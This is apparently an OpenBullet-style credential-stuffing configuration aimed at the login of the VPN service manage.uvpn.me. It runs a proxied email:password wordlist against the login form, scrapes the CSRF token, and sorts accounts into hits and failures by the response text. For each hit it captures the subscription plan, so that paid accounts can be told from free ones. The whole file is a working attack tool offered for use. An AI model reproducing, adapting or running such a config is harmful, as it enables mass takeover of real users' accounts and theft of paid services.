[SETTINGS]
{
  "Name": "uVPN",
  "SuggestedBots": 85,
  "MaxCPM": 0,
  "LastModified": "2020-09-04T16:36:50.8724732+04:30",
  "AdditionalInfo": "",
  "Author": "\"The_FiendQQ\"",
  "Version": "1.4.4 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "Crop": false,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#EncodeUSER FUNCTION URLEncode "<USER>" -> VAR "US" 

#EncodePASS FUNCTION URLEncode "<PASS>" -> VAR "PS" 

#Get REQUEST GET "https://manage.uvpn.me/login" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Token PARSE "<SOURCE>" LR "name=\"_token\" value=\"" "\"" -> VAR "Token" 

#Length FUNCTION Length "_token=<Token>&email=<US>&password=<PS>" -> VAR "Length" 

#Login REQUEST POST "https://manage.uvpn.me/login" 
  CONTENT "_token=<Token>&email=<US>&password=<PS>&remember=on" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9,fa;q=0.8" 
  HEADER "Cache-Control: max-age=0" 
  HEADER "Connection: keep-alive" 
  HEADER "Content-Length: <Length>" 
  HEADER "Host: manage.uvpn.me" 
  HEADER "Origin: https://manage.uvpn.me" 
  HEADER "Referer: https://manage.uvpn.me/login" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "These credentials do not match our records." 
  KEYCHAIN Success OR 
    KEY "Customer Info" 

#Subscription REQUEST GET "https://manage.uvpn.me/subscription" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Get PARSE "<SOURCE>" LR "Your plan</p>" "</p>" -> VAR "Get Plan" 

#Plan PARSE "<Get Plan>" LR "\">" "</span>" CreateEmpty=FALSE -> CAP "Subscription" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "Free plan" 

